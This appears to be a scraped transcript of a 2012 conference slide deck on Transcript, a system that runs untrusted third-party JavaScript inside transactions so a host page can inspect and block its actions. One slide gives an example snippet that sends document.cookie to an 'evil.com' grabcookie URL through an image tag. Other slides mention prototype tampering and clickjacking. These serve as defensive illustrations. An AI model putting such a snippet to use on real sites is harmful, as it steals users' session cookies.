Presentation is loading. Please wait.

Presentation is loading. Please wait.

Enhancing JavaScript with Transactions Mohan Dhawan †, Chung-chieh Shan ‡ and Vinod Ganapathy † † Department of Computer Science, Rutgers University ‡

Published byEgbert Glenn Modified over 8 years ago

Similar presentations

Presentation on theme: "Enhancing JavaScript with Transactions Mohan Dhawan †, Chung-chieh Shan ‡ and Vinod Ganapathy † † Department of Computer Science, Rutgers University ‡"— Presentation transcript:

1 Enhancing JavaScript with Transactions Mohan Dhawan †, Chung-chieh Shan ‡ and Vinod Ganapathy † † Department of Computer Science, Rutgers University ‡ School of Informatics and Computing, Indiana University November 24, 2015ECOOP 20121

2 Problem Web applications include third party content Examples: widgets, advertisements, libraries May contain untrusted, malicious JavaScript November 24, 2015ECOOP 20122

3 Example from nytimes.com Rogue third party advertisement Displayed image of fake virus scan Client security and privacy at risk November 24, 2015ECOOP 20123

4 Solution: Transcript Extend JavaScript to support Transactions Execute untrusted content speculatively Commit changes after policy enforcement Transaction Web Application November 24, 2015ECOOP 20124

5 Goal Protect the Web application from security violating actions of untrusted JavaScript Must handle arbitrary third party code written in JavaScript Including constructs such as eval, this, with. Must enforce powerful security policies Allow pop-ups from white-listed websites only. Dis-allow innerHTML in the context of host Web application. November 24, 2015ECOOP 20125

6 Contributions JavaScript transactions Speculative execution of unmodified third party JavaScript code Transaction suspend/resume Allow host Web application to mediate external actions like DOM and AJAX operations Speculative DOM updates November 24, 2015ECOOP 20126

7 Schematic use of Transcript // Web application code var tx = transaction{... // unmodified 3 rd party code... }; // Introspection block goes below /* policy enforcement code */ // validate actions of the transaction tx.commit(); //Rest of the Web application code Transaction Web Application November 24, 2015ECOOP 20127

8 Example: Untrusted code // Web application code var tx = transaction{ var image = document.createElement("img"); var url = "http://evil.com/grabcookie.php"; var params = document.cookie; image.src = url + "?cookie=" + params; document.body.appendChild(image);... Array.prototype.join = function() { return "evilString"; }; }; Transaction Web Application November 24, 2015ECOOP 20128

9 November 24, 20159 tx = transaction {... body.appendChild(image);... }; do {... tx = tx.resume();... } while(tx.isSuspended()); tx.commit(); Web application code … Rest of the Web application 2 3 4 5 6 Transcript runtime system Introspection block Transcript Runtime 1 DOM TX R/W sets call stack 3 rd party Transaction object tx web app …… 13 Transcript clones the host’s DOM when the transaction starts. DOM orig DOM TX Clone 1 web app call stack 3 rd -party …… 12 web app On a transaction suspend, the Transcript runtime saves all the i) read write sets, ii) speculative DOM, and iii) stack frames till the nearest transaction delimiter to create a Transaction object … call stack 3 rd party 5 DOM TX R/W sets call stack 3 rd party Transaction object tx web app* Transcript runtime loads the saved read write sets and stack frames when the transaction resumes. resume … 4 web app* image + DOM TX DOM’ TX appendChild tx’s write set + Heap orig Heap new DOM’ TX DOM new In the introspection block, the host performs the action (appendChild) on behalf of the guest. November 24, 2015ECOOP 20129

10 Transaction suspend and resume Transaction Web Application var tx = transaction{... document.body.appendChild(image); }; do{ var rs = tx.getReadSet(), arg = tx.getArgs(); switch(tx.getCause()) { case "appendChild": if (arg[0].nodeName.match("IMG") && !rs.checkMembership(document,"cookie"))‏ obj.appendChild(arg[0]); break; }; /* end switch */ tx = tx.resume(); }while(tx.isSuspended()); if (!(arg[0].nodeName.match("IMG") && rs.checkMembership(document,"cookie"))‏ obj.appendChild(arg[0]); Policy November 24, 2015ECOOP 201210

11 Read and Write Sets var tx = transaction{... Array.prototype.join = function() { return " evilString " ; }; }; /* Introspection Code */ var ws = tx.getWriteSet(); if(ws.checkMembership(Array.prototype, " * " ) { to_commit = false; } // Rest of the web application code Transaction Web Application var ws = tx.getWriteSet(); if(ws.checkMembership(Array.prototype, "*")){ to_commit = false; } Policy November 24, 2015ECOOP 201211

12 Gluing var tx = transaction{... document.write(‘<script src= “newcode.js”> ’) ; }; // Introspection block // Rest of the web application code Transaction Web Application November 24, 2015ECOOP 201212

13 Implementation Prototype implementation in Firefox 3.7a4 Added new JavaScript features transaction keyword and Transaction object Modified SpiderMonkey op-codes to Log all object accesses Suspend on DOM / AJAX calls Added speculative execution support for DOM operations Re-direct all node accesses to the cloned copy November 24, 2015ECOOP 201213

14 Evaluation Goals Study applicability of Transcript in isolating real guest code Measure performance impact on guest code and micro- benchmarks Demonstrate graceful recovery in presence of malicious and buggy guests Methodology Isolated the guest code in a Web application using transactions Introspection block for each transaction enforced a number of general and domain specific policies November 24, 201514November 24, 2015ECOOP 201214

15 Applicability of Transcript Applied Transcript on five JavaScript widgets and applications Stand-alone and library based No difference in behavior and functionality November 24, 201515 BenchmarksPolicies JS MenuNo network or cookie access Picture PuzzleDisallow attaching key event handlers Spell Checker No XMLHttpRequest if cookies were read GreyBox iframes to whitelisted URLs only Color Picker No innerHTML in host’s context November 24, 2015ECOOP 201215

16 Performance - Application benchmarks November 24, 201516 Overhead = 0.16s November 24, 2015ECOOP 201216

17 Performance – Microbenchmarks (Function calls) November 24, 201517 MicroBenchmarkOverhead Native Functions eval(“if (true) true; false;”)6.87x fn.call(this, i)1.89x External Operations getElementById(“checkbox”)6.78x createElement(“div”)3.69x addEventListener(“click”, clk, false)26.51x dispatchEvent(evt)1.20x document.write(“ x = 1; ”)2.01x document.write(“ Hi ”)1.26x November 24, 2015ECOOP 201217

18 Performance – Microbenchmarks (JavaScript Events) November 24, 201518 Average overhead of just 94μs per event. Event nameOverhead NormalizedRaw delay(µs) Drag event ( drag ) 1.71x97 Keyboard event ( keypress ) 1.16x150 Message event ( message ) 1.17x85 Mouse event ( click ) 1.54x86 Mouse event ( mouseover ) 2.05x88 Mutation event ( DOMAttrModified ) 2.14x88 UI Event ( overflow ) 1.97x61 November 24, 2015ECOOP 201218

19 Recovery Clickjacking November 24, 201519 document.write(` Goto Amazon ');... document.write(` Goto Amazon '); November 24, 2015ECOOP 201219

20 Related Work Staged information flow in JavaScript: PLDI'09 hybrid framework for JavaScript with the aim of protecting Web applications from untrusted code Conscript: S&P'10 aspect-oriented framework to specify and enforce fine- grained security policies for Web applications AdJail: Security'10 isolation mechanism to protect Web application content from malicious advertisements Caja, FBJS, AdSafe, etc. November 24, 2015ECOOP 201220

21 Conclusion Transcript implements JavaScript transactions to provide isolation and recovery Suspend operations that break isolation Resume operation if web application allows Enforcement of powerful security policies All data reads / writes are recorded Ability to inspect reads / writes before commit No restriction or changes to third party code November 24, 2015ECOOP 201221

22 Questions ? November 24, 2015ECOOP 201222

23 Event handler wrapper generation November 24, 2015ECOOP 201223 var tx = transaction{... node.addEventListener(“click”, handler, false); }; // Introspection block tx_handler = function(evt) { evt_tx = transaction { handler(evt); } iblock_func(evt_tx); } evt_tx = transaction { handler(evt); } var tx = transaction{... node.addEventListener(“click”, tx_handler, false); }; // Introspection block

24 A complete example November 24, 201524 (function () { var to_commit = true, e = eval; // indirect eval var tx = transaction{e(getFunctionBody(menu)); }; do {... tx = tx.resume(); } while(tx.isSuspended()); if(to_commit) tx.commit(); )(); November 24, 2015 ECOOP 2012 24

Download ppt "Enhancing JavaScript with Transactions Mohan Dhawan †, Chung-chieh Shan ‡ and Vinod Ganapathy † † Department of Computer Science, Rutgers University ‡"

Similar presentations

Widget Summit: Advanced JavaScript Joseph Smarr Plaxo, Inc. October 16, 2007.

Widget Summit: Advanced JavaScript Joseph Smarr Plaxo, Inc. October 16, 2007.
Protecting Browser State from Web Privacy Attacks Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell Stanford University.

Protecting Browser State from Web Privacy Attacks Collin Jackson, Andrew Bortz, Dan Boneh, John Mitchell Stanford University.
Presented by Vaibhav Rastogi. Current browsers try to separate host system from Web Websites evolved into web applications Lot of private data on the.

Presented by Vaibhav Rastogi. Current browsers try to separate host system from Web Websites evolved into web applications Lot of private data on the.
Analyzing Information Flow in JavaScript-based Browser Extensions Mohan Dhawan and Vinod Ganapathy Department of Computer Science Rutgers University 25.

Analyzing Information Flow in JavaScript-based Browser Extensions Mohan Dhawan and Vinod Ganapathy Department of Computer Science Rutgers University 25.
JavaScript FaaDoOEngineers.com FaaDoOEngineers.com.

JavaScript FaaDoOEngineers.com FaaDoOEngineers.com.
The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010.

The Case for JavaScript Transactions Mohan Dhawan, Chung-chieh Shan, Vinod Ganapathy Department of Computer Science Rutgers University PLAS 2010.
Enforcing Security Policies using Transactional Memory Introspection Vinod Ganapathy Rutgers University Arnar BirgissonMohan Dhawan Ulfar ErlingssonLiviu.

Enforcing Security Policies using Transactional Memory Introspection Vinod Ganapathy Rutgers University Arnar BirgissonMohan Dhawan Ulfar ErlingssonLiviu.
Monitoring Data Structures Using Hardware Transactional Memory Shakeel Butt 1, Vinod Ganapathy 1, Arati Baliga 2 and Mihai Christodorescu 3 1 Rutgers University,

Monitoring Data Structures Using Hardware Transactional Memory Shakeel Butt 1, Vinod Ganapathy 1, Arati Baliga 2 and Mihai Christodorescu 3 1 Rutgers University,
Secure In-VM Monitoring Using Hardware Virtualization Monirul Sharif, Wenke Lee, Weidong Cui, and Andrea Lanzi Presented by Tyler Bletsch.

Secure In-VM Monitoring Using Hardware Virtualization Monirul Sharif, Wenke Lee, Weidong Cui, and Andrea Lanzi Presented by Tyler Bletsch.
GATEKEEPER MOSTLY STATIC ENFORCEMENT OF SECURITY AND RELIABILITY PROPERTIES FOR JAVASCRIPT CODE Salvatore Guarnieri & Benjamin Livshits Presented by Michael.

GATEKEEPER MOSTLY STATIC ENFORCEMENT OF SECURITY AND RELIABILITY PROPERTIES FOR JAVASCRIPT CODE Salvatore Guarnieri & Benjamin Livshits Presented by Michael.
Ensuring Operating System Kernel Integrity with OSck By Owen S. Hofmann Alan M. Dunn Sangman Kim Indrajit Roy Emmett Witchel Kent State University College.

Ensuring Operating System Kernel Integrity with OSck By Owen S. Hofmann Alan M. Dunn Sangman Kim Indrajit Roy Emmett Witchel Kent State University College.
Analyzing Information Flow in JavaScript-based Browser Extensions Mohan Dhawan and Vinod Ganapathy Department of Computer Science Rutgers University.

Analyzing Information Flow in JavaScript-based Browser Extensions Mohan Dhawan and Vinod Ganapathy Department of Computer Science Rutgers University.
1 Yinzhi Cao, Zhichun Li *, Vaibhav Rastogi, Yan Chen, and Xitao Wen Labs of Internet Security and Technology Northwestern University * NEC Labs America.

1 Yinzhi Cao, Zhichun Li *, Vaibhav Rastogi, Yan Chen, and Xitao Wen Labs of Internet Security and Technology Northwestern University * NEC Labs America.
Presented by Vaibhav Rastogi.  Advent of Web 2.0 and Mashups  Inclusion of untrusted third party content a necessity  Need to restrict the functionality.

Presented by Vaibhav Rastogi.  Advent of Web 2.0 and Mashups  Inclusion of untrusted third party content a necessity  Need to restrict the functionality.
ConScript Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser Leo Meyerovich UC Berkeley Benjamin Livshits Microsoft.

ConScript Specifying and Enforcing Fine-Grained Security Policies for JavaScript in the Browser Leo Meyerovich UC Berkeley Benjamin Livshits Microsoft.
An Evaluation of the Google Chrome Extension Security Architecture

An Evaluation of the Google Chrome Extension Security Architecture
By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)

By Philipp Vogt, Florian Nentwich, Nenad Jovanovic, Engin Kirda, Christopher Kruegel, and Giovanni Vigna Network and Distributed System Security(NDSS ‘07)
Vaibhav Rastogi and Yi Yang.  Web 2.0 – rich applications  A website hosts content it may not be responsible for  Third party gadgets  Third party.

Vaibhav Rastogi and Yi Yang.  Web 2.0 – rich applications  A website hosts content it may not be responsible for  Third party gadgets  Third party.
Blackbox Reversing of XSS Filters Alexander Sotirov ekoparty 2008.

Blackbox Reversing of XSS Filters Alexander Sotirov ekoparty 2008.
The Most Dangerous Code in the Browser Stefan Heule, Devon Rifkin, Alejandro Russo, Deian Stefan Stanford University, Chalmers University of Technology.

The Most Dangerous Code in the Browser Stefan Heule, Devon Rifkin, Alejandro Russo, Deian Stefan Stanford University, Chalmers University of Technology.

Similar presentations

Ads by Google